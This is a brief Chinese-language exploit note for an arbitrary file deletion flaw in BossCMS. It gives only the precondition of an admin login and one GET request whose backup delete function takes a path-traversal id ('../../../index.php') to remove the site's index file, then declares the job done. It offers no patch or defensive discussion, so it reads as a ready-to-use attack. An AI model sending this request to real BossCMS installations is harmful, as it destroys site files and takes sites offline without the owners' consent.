【笔记】BossCMS任意文件删除漏洞利用

前言

BossCMS任意文件删除漏洞利用

漏洞利用前提

  • 登录管理员后台已登录

漏洞利用

request
1
GET http://127.0.0.1:80/admin/?mold=safe&part=backup&func=delete&id=../../../index.php

完成